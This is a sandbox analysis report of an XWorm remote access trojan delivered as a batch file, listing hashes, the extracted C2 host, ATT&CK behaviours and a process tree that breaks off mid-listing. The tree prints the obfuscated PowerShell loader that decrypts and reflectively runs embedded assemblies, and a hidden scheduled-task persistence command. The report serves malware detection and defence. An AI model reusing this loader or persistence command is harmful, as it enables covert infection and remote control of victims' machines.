xworm | f07d66adf106785f59920963b5c928dfd5a16774ab476f262135bc3c2cd58590

Analysis

max time kernel
77s
max time network
69s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20250113-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20250113-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
21-01-2025 22:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

$phantomClient.bat
Size

278KB
MD5

c7f70f6597b99690acab02390af9a913
SHA1

ec989e5b37d4d9bf56d9b330ed97826313ae3255
SHA256

f07d66adf106785f59920963b5c928dfd5a16774ab476f262135bc3c2cd58590
SHA512

991f4c36731dea73455da9a81185af01fb54cda915b5632edbc3f2251648745e47fd09b21d6548dcae170b1bfcf470b89f311cefc6733013be23667b31ae036b
SSDEEP

6144:3LDqmpofOLfpSCTvwLEbxm1/zGfAaWK6NY8M2PZaNSRw4ia:bDqmpofOLfh73KqltvChaivL

Score

10^/10

xworm defense_evasion execution persistence rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

real-enquiry.gl.at.ply.gg:15403

Mutex

Twor9QJPgxqGUGz9

Attributes

Install_directory
%Public%
install_file
USB.exe

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral1/memory/1152-146-0x0000024E1A500000-0x0000024E1A510000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 3 IoCs

flow	pid	Process
17	1152	powershell.exe
28	1152	powershell.exe
51	1152	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2444	powershell.exe
1128	powershell.exe
1152	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3982764349-3037452555-3708423086-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$phantomClient.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$phantomClient.lnk	powershell.exe

Indicator Removal: Clear Windows Event Logs 1 TTPs 2 IoCs

Clear Windows Event Logs to hide the activity of an intrusion.

defense_evasion

Clear Windows Event Logs

T1070.001

description	ioc	Process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx	svchost.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3982764349-3037452555-3708423086-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$phantomClient = "C:\\Users\\Public\\$phantomClient"	powershell.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
16	ip-api.com

Drops file in System32 directory 12 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work	svchost.exe
File opened for modification	C:\Windows\system32\SleepStudy\user-not-present-trace-2025-01-21-22-43-43.etl	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File created	C:\Windows\system32\SleepStudy\user-not-present-trace-2025-01-21-22-43-43.etl	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work	svchost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "0018001210316B9F"	svchost.exe

Modifies registry class 8 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3982764349-3037452555-3708423086-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI\Global.IrisService	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3982764349-3037452555-3708423086-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI\Global.IrisService\V1	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3982764349-3037452555-3708423086-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI\Global.IrisService\V1\LU	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3982764349-3037452555-3708423086-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI\Global.IrisService\V1\LU\PCT = "133819730010658283"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3982764349-3037452555-3708423086-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI\Global.IrisService\V1\LU\PTT = "133819730323326098"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3982764349-3037452555-3708423086-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-3982764349-3037452555-3708423086-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3982764349-3037452555-3708423086-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI	svchost.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2444	powershell.exe
2444	powershell.exe
1128	powershell.exe
1128	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3588	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2444	powershell.exe
Token: SeDebugPrivilege	1128	powershell.exe
Token: SeIncreaseQuotaPrivilege	1128	powershell.exe
Token: SeSecurityPrivilege	1128	powershell.exe
Token: SeTakeOwnershipPrivilege	1128	powershell.exe
Token: SeLoadDriverPrivilege	1128	powershell.exe
Token: SeSystemProfilePrivilege	1128	powershell.exe
Token: SeSystemtimePrivilege	1128	powershell.exe
Token: SeProfSingleProcessPrivilege	1128	powershell.exe
Token: SeIncBasePriorityPrivilege	1128	powershell.exe
Token: SeCreatePagefilePrivilege	1128	powershell.exe
Token: SeBackupPrivilege	1128	powershell.exe
Token: SeRestorePrivilege	1128	powershell.exe
Token: SeShutdownPrivilege	1128	powershell.exe
Token: SeDebugPrivilege	1128	powershell.exe
Token: SeSystemEnvironmentPrivilege	1128	powershell.exe
Token: SeRemoteShutdownPrivilege	1128	powershell.exe
Token: SeUndockPrivilege	1128	powershell.exe
Token: SeManageVolumePrivilege	1128	powershell.exe
Token: 33	1128	powershell.exe
Token: 34	1128	powershell.exe
Token: 35	1128	powershell.exe
Token: 36	1128	powershell.exe
Token: SeIncreaseQuotaPrivilege	1128	powershell.exe
Token: SeSecurityPrivilege	1128	powershell.exe
Token: SeTakeOwnershipPrivilege	1128	powershell.exe
Token: SeLoadDriverPrivilege	1128	powershell.exe
Token: SeSystemProfilePrivilege	1128	powershell.exe
Token: SeSystemtimePrivilege	1128	powershell.exe
Token: SeProfSingleProcessPrivilege	1128	powershell.exe
Token: SeIncBasePriorityPrivilege	1128	powershell.exe
Token: SeCreatePagefilePrivilege	1128	powershell.exe
Token: SeBackupPrivilege	1128	powershell.exe
Token: SeRestorePrivilege	1128	powershell.exe
Token: SeShutdownPrivilege	1128	powershell.exe
Token: SeDebugPrivilege	1128	powershell.exe
Token: SeSystemEnvironmentPrivilege	1128	powershell.exe
Token: SeRemoteShutdownPrivilege	1128	powershell.exe
Token: SeUndockPrivilege	1128	powershell.exe
Token: SeManageVolumePrivilege	1128	powershell.exe
Token: 33	1128	powershell.exe
Token: 34	1128	powershell.exe
Token: 35	1128	powershell.exe
Token: 36	1128	powershell.exe
Token: SeIncreaseQuotaPrivilege	1128	powershell.exe
Token: SeSecurityPrivilege	1128	powershell.exe
Token: SeTakeOwnershipPrivilege	1128	powershell.exe
Token: SeLoadDriverPrivilege	1128	powershell.exe
Token: SeSystemProfilePrivilege	1128	powershell.exe
Token: SeSystemtimePrivilege	1128	powershell.exe
Token: SeProfSingleProcessPrivilege	1128	powershell.exe
Token: SeIncBasePriorityPrivilege	1128	powershell.exe
Token: SeCreatePagefilePrivilege	1128	powershell.exe
Token: SeBackupPrivilege	1128	powershell.exe
Token: SeRestorePrivilege	1128	powershell.exe
Token: SeShutdownPrivilege	1128	powershell.exe
Token: SeDebugPrivilege	1128	powershell.exe
Token: SeSystemEnvironmentPrivilege	1128	powershell.exe
Token: SeRemoteShutdownPrivilege	1128	powershell.exe
Token: SeUndockPrivilege	1128	powershell.exe
Token: SeManageVolumePrivilege	1128	powershell.exe
Token: 33	1128	powershell.exe
Token: 34	1128	powershell.exe
Token: 35	1128	powershell.exe

Suspicious use of FindShellTrayWindow 45 IoCs

pid	Process
3252	taskmgr.exe
3252	taskmgr.exe
3252	taskmgr.exe
3252	taskmgr.exe
3252	taskmgr.exe
3252	taskmgr.exe
3252	taskmgr.exe
3252	taskmgr.exe
3252	taskmgr.exe
3252	taskmgr.exe
3252	taskmgr.exe
3252	taskmgr.exe
3252	taskmgr.exe
3588	Explorer.EXE
3588	Explorer.EXE
3588	Explorer.EXE
3252	taskmgr.exe
3252	taskmgr.exe
3252	taskmgr.exe
3252	taskmgr.exe
3252	taskmgr.exe
3252	taskmgr.exe
3252	taskmgr.exe
3252	taskmgr.exe
3252	taskmgr.exe
3252	taskmgr.exe
3252	taskmgr.exe
3252	taskmgr.exe
3252	taskmgr.exe
3252	taskmgr.exe
3252	taskmgr.exe
3252	taskmgr.exe
3252	taskmgr.exe
3252	taskmgr.exe
3252	taskmgr.exe
3252	taskmgr.exe
3252	taskmgr.exe
3252	taskmgr.exe
3252	taskmgr.exe
3252	taskmgr.exe
3252	taskmgr.exe
3252	taskmgr.exe
3252	taskmgr.exe
3252	taskmgr.exe
3252	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
3252	taskmgr.exe
3252	taskmgr.exe
3252	taskmgr.exe
3252	taskmgr.exe
3252	taskmgr.exe
3252	taskmgr.exe
3252	taskmgr.exe
3252	taskmgr.exe
3252	taskmgr.exe
3252	taskmgr.exe
3252	taskmgr.exe
3252	taskmgr.exe
3252	taskmgr.exe
3588	Explorer.EXE
3588	Explorer.EXE
3588	Explorer.EXE
3588	Explorer.EXE
3588	Explorer.EXE
3252	taskmgr.exe
3588	Explorer.EXE
3588	Explorer.EXE
3588	Explorer.EXE
3588	Explorer.EXE
3588	Explorer.EXE
3588	Explorer.EXE
3588	Explorer.EXE
3588	Explorer.EXE
3588	Explorer.EXE
3588	Explorer.EXE
3588	Explorer.EXE
3588	Explorer.EXE
3588	Explorer.EXE
3588	Explorer.EXE
3588	Explorer.EXE
3588	Explorer.EXE
3588	Explorer.EXE
3588	Explorer.EXE
3588	Explorer.EXE
3588	Explorer.EXE
3588	Explorer.EXE
3588	Explorer.EXE
3588	Explorer.EXE
3588	Explorer.EXE
3588	Explorer.EXE
3588	Explorer.EXE
3588	Explorer.EXE
3588	Explorer.EXE
3588	Explorer.EXE
3588	Explorer.EXE
3588	Explorer.EXE
3588	Explorer.EXE
3588	Explorer.EXE
3588	Explorer.EXE
3588	Explorer.EXE
3588	Explorer.EXE
3588	Explorer.EXE
3588	Explorer.EXE
3588	Explorer.EXE
3588	Explorer.EXE
3588	Explorer.EXE
3588	Explorer.EXE
3588	Explorer.EXE
3588	Explorer.EXE
3588	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1392 wrote to memory of 3688	1392	cmd.exe	82
PID 1392 wrote to memory of 3688	1392	cmd.exe	82
PID 3688 wrote to memory of 4144	3688	net.exe	83
PID 3688 wrote to memory of 4144	3688	net.exe	83
PID 1392 wrote to memory of 4628	1392	cmd.exe	85
PID 1392 wrote to memory of 4628	1392	cmd.exe	85
PID 1392 wrote to memory of 2444	1392	cmd.exe	86
PID 1392 wrote to memory of 2444	1392	cmd.exe	86
PID 2444 wrote to memory of 1128	2444	powershell.exe	87
PID 2444 wrote to memory of 1128	2444	powershell.exe	87
PID 2444 wrote to memory of 1064	2444	powershell.exe	92
PID 2444 wrote to memory of 1064	2444	powershell.exe	92
PID 1064 wrote to memory of 4388	1064	WScript.exe	93
PID 1064 wrote to memory of 4388	1064	WScript.exe	93
PID 4388 wrote to memory of 1840	4388	cmd.exe	95
PID 4388 wrote to memory of 1840	4388	cmd.exe	95
PID 1840 wrote to memory of 4640	1840	net.exe	96
PID 1840 wrote to memory of 4640	1840	net.exe	96
PID 4388 wrote to memory of 4396	4388	cmd.exe	98
PID 4388 wrote to memory of 4396	4388	cmd.exe	98
PID 4388 wrote to memory of 1152	4388	cmd.exe	99
PID 4388 wrote to memory of 1152	4388	cmd.exe	99
PID 1152 wrote to memory of 3588	1152	powershell.exe	56
PID 1152 wrote to memory of 3432	1152	powershell.exe	73
PID 1152 wrote to memory of 1960	1152	powershell.exe	33
PID 1152 wrote to memory of 972	1152	powershell.exe	12
PID 1152 wrote to memory of 1756	1152	powershell.exe	31
PID 1152 wrote to memory of 768	1152	powershell.exe	14
PID 1152 wrote to memory of 2840	1152	powershell.exe	46
PID 1152 wrote to memory of 1144	1152	powershell.exe	19
PID 1152 wrote to memory of 1724	1152	powershell.exe	30
PID 1152 wrote to memory of 544	1152	powershell.exe	67
PID 1152 wrote to memory of 3296	1152	powershell.exe	55
PID 1152 wrote to memory of 2096	1152	powershell.exe	97
PID 1152 wrote to memory of 2308	1152	powershell.exe	41
PID 1152 wrote to memory of 1320	1152	powershell.exe	22
PID 1152 wrote to memory of 2780	1152	powershell.exe	45
PID 1152 wrote to memory of 916	1152	powershell.exe	11
PID 1152 wrote to memory of 2884	1152	powershell.exe	49
PID 1152 wrote to memory of 1700	1152	powershell.exe	37
PID 1152 wrote to memory of 2876	1152	powershell.exe	48
PID 1152 wrote to memory of 2284	1152	powershell.exe	40
PID 1152 wrote to memory of 1288	1152	powershell.exe	21
PID 1152 wrote to memory of 1672	1152	powershell.exe	29
PID 1152 wrote to memory of 2260	1152	powershell.exe	39
PID 1152 wrote to memory of 2648	1152	powershell.exe	71
PID 1152 wrote to memory of 1660	1152	powershell.exe	28
PID 1152 wrote to memory of 1856	1152	powershell.exe	32
PID 1152 wrote to memory of 476	1152	powershell.exe	13
PID 1152 wrote to memory of 668	1152	powershell.exe	15
PID 1152 wrote to memory of 1452	1152	powershell.exe	26
PID 1152 wrote to memory of 1052	1152	powershell.exe	17
PID 1152 wrote to memory of 3020	1152	powershell.exe	52
PID 1152 wrote to memory of 1436	1152	powershell.exe	25
PID 1152 wrote to memory of 1632	1152	powershell.exe	27
PID 1152 wrote to memory of 3600	1152	powershell.exe	57
PID 1152 wrote to memory of 2412	1152	powershell.exe	42
PID 1152 wrote to memory of 2016	1152	powershell.exe	36
PID 1152 wrote to memory of 1420	1152	powershell.exe	24
PID 1152 wrote to memory of 1412	1152	powershell.exe	23
PID 1152 wrote to memory of 2000	1152	powershell.exe	35
PID 1152 wrote to memory of 816	1152	powershell.exe	10
PID 1152 wrote to memory of 1204	1152	powershell.exe	20
PID 1152 wrote to memory of 2580	1152	powershell.exe	44

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p
1⤵
- Drops file in System32 directory
- Modifies registry class
PID:816
- C:\Windows\System32\mousocoreworker.exe
  C:\Windows\System32\mousocoreworker.exe -Embedding
  2⤵
  PID:4012
- C:\Windows\System32\RuntimeBroker.exe
  C:\Windows\System32\RuntimeBroker.exe -Embedding
  2⤵
  PID:4236
- C:\Windows\System32\smartscreen.exe
  C:\Windows\System32\smartscreen.exe -Embedding
  2⤵
  PID:2980

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS -p
1⤵
PID:916

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:972

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:476

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Indicator Removal: Clear Windows Event Logs
PID:768

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:668

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:936

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1052

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:1144

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1204

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
1⤵
PID:1288

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1320

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1412

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1420

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1436

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1452

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1632

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1660

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1672

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1724

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1756

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1856

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1960

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1988

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:2000

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:2016

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1700

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
1⤵
PID:2260

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2284

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2308

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2412

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2572

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2580

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2780

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2840

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2876

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2884

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:3020

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:3296

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3588
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\$phantomClient.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1392
- - C:\Windows\system32\net.exe
    net file
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3688
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 file
      4⤵
      PID:4144
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('a6/Dz0sQgg0AXxVY9QgYlHPhkoWXKtsBNvv5q5mWBz0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XHnjn+k0TpEqrCKjUcNHHQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $HpFJb=New-Object System.IO.MemoryStream(,$param_var); $aolNn=New-Object System.IO.MemoryStream; $iXSFF=New-Object System.IO.Compression.GZipStream($HpFJb, [IO.Compression.CompressionMode]::Decompress); $iXSFF.CopyTo($aolNn); $iXSFF.Dispose(); $HpFJb.Dispose(); $aolNn.Dispose(); $aolNn.ToArray();}function execute_function($param_var,$param2_var){ $joNGZ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XpYvB=$joNGZ.EntryPoint; $XpYvB.Invoke($null, $param2_var);}$DxRwH = 'C:\Users\Admin\AppData\Local\Temp\$phantomClient.bat';$host.UI.RawUI.WindowTitle = $DxRwH;$NGRKp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($DxRwH).Split([Environment]::NewLine);foreach ($lDbVo in $NGRKp) { if ($lDbVo.StartsWith('aTooeqEeiEcbowJqPEvQ')) { $AbfNn=$lDbVo.Substring(20); break; }}$payloads_var=[string[]]$AbfNn.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
    3⤵
    PID:4628
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2444
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_282_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_282.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1128
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_282.vbs"
      4⤵
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:1064
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_282.bat" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4388
      - C:\Windows\system32\net.exe
        
        net file
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1840
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        7⤵
        
        PID:4640
      - C:\Windows\system32\cmd.exe
        
